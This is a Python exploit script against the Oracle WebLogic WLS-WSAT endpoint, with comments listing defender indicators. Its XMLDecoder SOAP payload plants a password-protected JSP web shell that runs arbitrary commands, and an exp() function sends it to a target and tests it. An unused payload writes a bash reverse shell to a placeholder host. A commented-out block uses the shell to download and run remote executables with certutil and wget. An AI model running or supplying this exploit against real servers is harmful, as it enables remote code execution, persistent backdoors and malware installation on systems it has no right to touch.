import requests

# HTTP headers attached to the SOAP POST. The User-Agent is a fixed, very
# dated Firefox/Windows XP string that every request from this script reuses
# verbatim, which makes it a cheap signature to look for in access logs.
headers = dict(
    [
        ("User-Agent", "Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0"),
        ("Accept-Charset", "GBK,utf-8;q=0.7,*;q=0.3"),
        ("Content-Type", "text/xml"),
    ]
)


# SOAP envelope aimed at the WebLogic WLS-WSAT endpoint. The work:WorkContext
# header carries a java.beans.XMLDecoder document; on a server that still
# decodes it, the document instantiates a java.io.PrintWriter on a path under
# the bea_wls_internal web application and println()s a JSP file there.
# The embedded JSP checks the "pwd" query parameter against a hard-coded value
# and hands the "i" parameter to Runtime.exec(), echoing the output between a
# "<xi4okv>" marker and a <pre> block -- i.e. it is a command-execution web
# shell dropped by the deserialization step.
# Defender indicators visible in this literal: a text/xml POST whose body
# contains `class="java.beans.XMLDecoder"` inside a WorkContext header, and a
# new .jsp file appearing under .../bea_wls_internal/9j4dqk/war/. Both are
# worth alerting on (WAF / reverse proxy rules for the former, file-integrity
# monitoring of the WebLogic tmp tree for the latter).
payload = '''
    <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header><work:WorkContext
    xmlns:work="http://bea.com/2004/06/soap/workarea/"><java><java version="1.4.0" class="java.beans.XMLDecoder">
    <void class="java.io.PrintWriter"> <string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/demo.jsp</string>
    <void method="println"><string><![CDATA[<%   if("xk".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
        int a = -1;
        byte[] b = new byte[2048];
        out.print("<xi4okv><pre>");
        while((a=in.read(b))!=-1){
            out.println(new String(b));
        }
        out.print("</pre>");
    } %>]]></string></void><void method="close"/>
    </void></java></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>
'''

# Second XMLDecoder document with the same structure as `payload`, but the
# PrintWriter target is a shell script (1.sh) whose single line is a bash
# reverse-shell command; its host/port are left as the placeholder "xxx/xxx".
# exp() below never references this literal, so it is dead code as written.
# It is still a useful hunting artifact: a 1.sh appearing under the
# bea_wls_internal war directory, or an outbound /dev/tcp-style connection
# originating from the WebLogic server process, points at post-exploitation
# activity following the XMLDecoder step.
payload_shell = '''
    <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header><work:WorkContext
    xmlns:work="http://bea.com/2004/06/soap/workarea/"><java><java version="1.4.0" class="java.beans.XMLDecoder">
    <void class="java.io.PrintWriter"> <string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/1.sh</string>
    <void method="println"><string><![CDATA[bash -i >& /dev/tcp/xxx/xxx 0>&1]]></string></void><void method="close"/>
    </void></java></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>
'''




def exp(target):
    url = 'http://' + target + '/wls-wsat/CoordinatorPortType11'
    resp = requests.post(url, data=payload, headers=headers, timeout=5)  # attack
    
    url = 'http://' + target + '/bea_wls_internal/demo.jsp?pwd=xk&i=whoami'
    resp = requests.get(url, timeout=5)
    if resp.status_code == 200 and "xi4okv" in resp.text:
        print ("\n" + url + "===>" + resp.text[0:20])
        
    
    
    '''
    if resp.status_code == 200:
        if "xi4okv" in resp.text:
            print "\n" + url + "===>" + resp.text[0:20]
            
            cmd = "certutil.exe -urlcache -split -f http://xxxx/smss.exe"
            run = "smss.exe"          
            requests.get('http://' + target + '/bea_wls_internal/demo.jsp?pwd=xk&i=' + cmd, timeout=5)
            requests.get('http://' + target + '/bea_wls_internal/demo.jsp?pwd=xk&i=' + run, timeout=5)
            
            cmd = "wget http://xxxxx/error.py"
            run = "python error.py"
            
            requests.get('http://' + target + '/bea_wls_internal/demo.jsp?pwd=xk&i=' + cmd, timeout=5)
            requests.get('http://' + target + '/bea_wls_internal/demo.jsp?pwd=xk&i=' + run, timeout=5)
   '''


